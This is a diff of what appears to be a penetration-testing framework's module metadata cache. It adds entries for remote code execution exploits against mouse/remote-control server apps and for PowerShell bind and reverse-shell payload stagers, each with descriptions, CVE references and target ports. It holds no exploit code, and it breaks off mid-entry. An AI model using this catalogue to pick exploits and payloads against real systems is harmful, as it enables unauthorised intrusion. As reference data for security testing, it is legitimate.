-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/local/powershell_remoting.rb",
    "is_install_path": true,
    "ref_name": "windows/local/powershell_remoting",
@@ -155088,7 +155825,7 @@
    "targets": [
      "Microsoft Windows"
    ],
-    "mod_time": "2022-05-25 13:11:34 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/exploits/windows/local/vss_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/vss_persistence",
@@ -155100,11 +155837,11 @@
        "crash-safe"
      ],
      "Reliability": [
-        "artifacts-on-disk",
-        "config-changes"
+        "repeatable-session"
      ],
      "SideEffects": [
-        "repeatable-session"
+        "artifacts-on-disk",
+        "config-changes"
      ]
    },
    "session_types": [
@@ -155238,7 +155975,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-09-23 17:41:20 +0000",
    "path": "/modules/exploits/windows/local/wmi.rb",
    "is_install_path": true,
    "ref_name": "windows/local/wmi",
@@ -159311,6 +160048,57 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/mobile_mouse_rce": {
+    "name": "Mobile Mouse RCE",
+    "fullname": "exploit/windows/misc/mobile_mouse_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-20",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "CHOKRI HAMMEDI"
+    ],
+    "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.6.0.4, current at the time of module writing",
+    "references": [
+      "EDB-51010",
+      "URL-https://mobilemouse.com/"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 9099,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "default"
+    ],
+    "mod_time": "2022-09-27 14:51:03 +0000",
+    "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/mobile_mouse_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/ms07_064_sami": {
    "name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow",
    "fullname": "exploit/windows/misc/ms07_064_sami",
@@ -159794,6 +160582,61 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/remote_mouse_rce": {
+    "name": "Remote Mouse RCE",
+    "fullname": "exploit/windows/misc/remote_mouse_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-04-15",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "0RPHON",
+      "H4rk3nz0"
+    ],
+    "description": "This module utilizes the Remote Mouse Server by Emote Interactive protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 4.110, current at the time of module writing",
+    "references": [
+      "EDB-46697",
+      "CVE-2022-3365",
+      "URL-https://www.remotemouse.net/",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 1978,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "default"
+    ],
+    "mod_time": "2022-10-03 15:25:53 +0000",
+    "path": "/modules/exploits/windows/misc/remote_mouse_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/remote_mouse_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/sap_2005_license": {
    "name": "SAP Business One License Manager 2005 Buffer Overflow",
    "fullname": "exploit/windows/misc/sap_2005_license",
@@ -160242,6 +161085,60 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/unified_remote_rce": {
+    "name": "Unified Remote Auth Bypass to RCE",
+    "fullname": "exploit/windows/misc/unified_remote_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-02-25",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "H4RK3NZ0"
+    ],
+    "description": "This module utilizes the Unified Remote remote control protocol to type out and\n          deploy a payload.  The remote control protocol can be configured to have no passwords,\n          a group password, or individual user accounts.  If the web page is accessible, the\n          access control is set to no password for exploitation, then reverted.\n          If the web page is not accessible, exploitation will be tried blindly.\n          This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.",
+    "references": [
+      "EDB-49587",
+      "URL-https://www.unifiedremote.com/",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py",
+      "CVE-2022-3229"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 9512,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "pull"
+    ],
+    "mod_time": "2022-09-26 15:45:42 +0000",
+    "path": "/modules/exploits/windows/misc/unified_remote_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/unified_remote_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/veeam_one_agent_deserialization": {
    "name": "Veeam ONE Agent .NET Deserialization",
    "fullname": "exploit/windows/misc/veeam_one_agent_deserialization",
@@ -160384,6 +161281,62 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/wifi_mouse_rce": {
+    "name": "Wifi Mouse RCE",
+    "fullname": "exploit/windows/misc/wifi_mouse_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-02-25",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "REDHATAUGUST",
+      "H4RK3NZ0"
+    ],
+    "description": "The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the\n          authentication is completely implemented entirely on the client side. By utilizing\n          this vulnerability, is possible to open a program on the server\n          (cmd.exe in our case) and type commands that will be executed as the user running\n          WiFi Mouse (Mouse Server), resulting in remote code execution.\n\n          Tested against versions 1.8.3.4 (current as of module writing) and\n          1.8.2.3.",
+    "references": [
+      "EDB-50972",
+      "EDB-49601",
+      "CVE-2022-3218",
+      "URL-http://wifimouse.necta.us/",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 1978,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "stager"
+    ],
+    "mod_time": "2022-09-26 15:45:42 +0000",
+    "path": "/modules/exploits/windows/misc/wifi_mouse_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/wifi_mouse_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/windows_rsh": {
    "name": "Windows RSH Daemon Buffer Overflow",
    "fullname": "exploit/windows/misc/windows_rsh",
@@ -165516,7 +166469,7 @@
      "Windows 10 Pro",
      "Windows 10 Enterprise Evaluation"
    ],
-    "mod_time": "2022-04-08 15:48:45 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -165625,7 +166578,7 @@
    "targets": [
      "Windows 2000 / Windows XP / Windows 2003"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/netidentity_xtierrpcpipe",
@@ -168538,7 +169491,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -168574,7 +169527,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -168610,7 +169563,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -168680,7 +169633,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -168716,7 +169669,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -168752,7 +169705,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-04 14:43:05 +0000",
+    "mod_time": "2022-08-30 10:15:36 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -168888,7 +169841,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/bsd/x64/exec.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/exec",
@@ -169130,7 +170083,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-22 12:55:41 +0000",
    "path": "/modules/payloads/singles/bsd/x86/exec.rb",
    "is_install_path": true,
    "ref_name": "bsd/x86/exec",
@@ -172495,6 +173448,1056 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_hidden_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_nonx_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/find_tag": {
+    "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/find_tag",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "skape <mmiller@hick.org>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Use an established connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/find_tag",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_hop_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_hop_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "scriptjunkie <scriptjunkie@scriptjunkie.us>",
+      "bannedit <bannedit@metasploit.com>",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_hop_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_https": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_https_proxy": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_https_proxy",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "corelanc0d3r <peter.ve@corelan.be>",
+      "amaloteaux <alex_maloteaux@metasploit.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_https_proxy",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
